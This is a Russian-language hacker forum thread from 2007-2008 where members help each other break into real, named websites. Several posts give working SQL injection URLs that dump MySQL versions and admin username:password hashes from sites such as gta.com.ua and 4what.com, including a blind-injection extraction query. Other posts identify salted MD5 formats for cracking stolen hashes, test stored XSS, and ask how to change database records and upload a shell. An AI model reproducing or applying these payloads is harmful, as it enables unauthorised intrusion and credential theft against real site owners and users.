Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    сервис..мм..попробуй, там по моему соленые мд5 тоже катят:
     
  2. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    а вот это какого вида???

    admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvva P7o9I

    вида md5(md5($pass).$salt) или какого?
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Если джумла то md5($pass.$salt)
     
    1 person likes this.
  4. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    помогие со скулей
    http://www.wfsj.org/resources/page.php?id=-69+union+select+1,2,3,4,5,6,7,8,9,0,1/*
    нимогу ни версию ни всего остольного получить
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    SVAROG
    http://www.wfsj.org/resources/page.php?id=-69+union+select+1,2,UNHEX(HEX(version())),4,5,6,7,8,9,0,1/*
     
  6. georgich

    georgich New Member

    Joined:
    19 Jun 2008
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Вот хотел узнать, как можно узнать адрес админки? Ну, а потом, если повезет, то и багу какую-нибудь для доступа к сайту. Буду очень признателен за инфу. Спасибо.
     
  7. Elephant

    Elephant New Member

    Joined:
    31 Jul 2008
    Messages:
    10
    Likes Received:
    2
    Reputations:
    -5
    http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,4,5,6,7,8,9,10,11+from+gtacom_gta.tables+where+TABLE_NAME=users,12,13,14,15,16,17,18,19,20/*

    Что я неправельно сделал?

    Мне надо из базы посмотреть названия таблиц, а я немогу((((9
     
  8. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    0_о
    Это пипец какой-то. Я покушал валидола, успокоился и отвечаю, запрос апсолютна нихрена неправильный - это раз. Во - вторых версия мускула 4, имена всех таблиц ты никак не увидишь, только перебор таблиц -
    Code:
    http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
    
    И вот тебе бонус -
    Code:
    http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+admin/*
    
    Читай маны, а то после еще одного такого поста у мну инфаркт случится
     
    #2968 0nep@t0p, 17 Aug 2008
    Last edited: 17 Aug 2008
    3 people like this.
  9. extrem0

    extrem0 New Member

    Joined:
    16 Aug 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    http://site.com/account/index.php?n=shops&shop=9+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+account+limit+0,1),1,1))>51

    Ситуация такова: веб-сервер с мускулом 5, нашел уязвимость . Знаю названия: базы,таблиц,колонок. Посредством слепой иньекции выудил логин(username) и хэш(password) админа из таблицы account (см. выше)

    Вопрос:
    Т.к. не удается сбрутить хэш ( хэш из пароля видимо получается в несколько неизвестных шагов,а не просто "sha1(password)"), возник вопрос. Как модифицировать в этой же таблице "account" значение в колонке "banned" с 1 на 0 ?
     
    #2969 extrem0, 17 Aug 2008
    Last edited: 17 Aug 2008
  10. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Это майскуль, разделение запросов в ней отсутствует, то есть модифицировать информацию в базе данных посредством скуль инъекции тебе не удастся
     
  11. extrem0

    extrem0 New Member

    Joined:
    16 Aug 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Понятно... А существует ли иной способ модификации инфы(через php например) ?
     
  12. Cry Wolf

    Cry Wolf New Member

    Joined:
    18 Jul 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Возник такой вопрос. Ввел в строку имени в коментах к статьям привычный <script>alert()</script>, имя в комментарии не отобразилось, а при каждом входе на страницу теперь опера выдает уведомление о выполнении джава скрипта... Это активная XSS?

    Вот ссылка http://gayby.org/news/comments/192.html
     
  13. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    А точка с запятой?
     
  14. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Да, там кстати кавычки фильтруются.

    Нет, не путай MySQL5 и MSSQL
     
    #2974 Ded MustD!e, 18 Aug 2008
    Last edited: 18 Aug 2008
  15. serfertty

    serfertty Guest

    Reputations:
    0
    Мож кто -нибудь осветит мой вопрос по mod_rewrite?
    Вот уязвимый скрипт
    Code:
    http://www.savchenko.ru/developments/84.html
    
     
  16. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Невижу вопроса. /85-1.html уязвимость есть.
     
  17. serfertty

    serfertty Guest

    Reputations:
    0
    Вопрос не в этом вопрос в том как это обходить!Он просто выводит пустую страницу,при обычных запросах,здесь нужен посимв.перебор?
     
  18. \\cRAcKEr//

    \\cRAcKEr// New Member

    Joined:
    17 Aug 2008
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    www.4what.com

    Здравствуйте! Я долго копался на этом форуме и нашел где мне помогут насчет SQL-инъекции на сайте
    Site:www.4what.com
    Зайдя на https://www.4what.com/news.php?id=55' появилась ошибка:
    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/fwhat/public_html/news.php on line 149
    Далее зашел на
    http://www.4what.com/news.php?id=-1+union+select+1,2,user+from+mysql.user/*
    высветилось логин:4what
    потом
    http://www.4what.com/news.php?id=-1+union+select+null,mysql.user.password,null+from+mysql.user/*
    высветилось хэш:*832547126835E90D7CCB5772A85B0E6552904217
    (а зачем звездочка?)
    Дальше не знаю
    Можно ли этот хэш поменять на свой? И какой командой(UPDATE? не получается че то)
    И последний вопрос Подскажите что надо сделать что бы загрузитьт туда шелл
    Спасибо вам за ответы кто ответит....
     
    1 person likes this.
  19. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,193
    Reputations:
    430
    Там версия пятая. Какие проблемы?
    table_name+from+information_schema.tables+limit+1,1/*
    И поехали...
     
    1 person likes this.
  20. \\cRAcKEr//

    \\cRAcKEr// New Member

    Joined:
    17 Aug 2008
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Спасибо Ch3ck за помощь!
     
Thread Status:
Not open for further replies.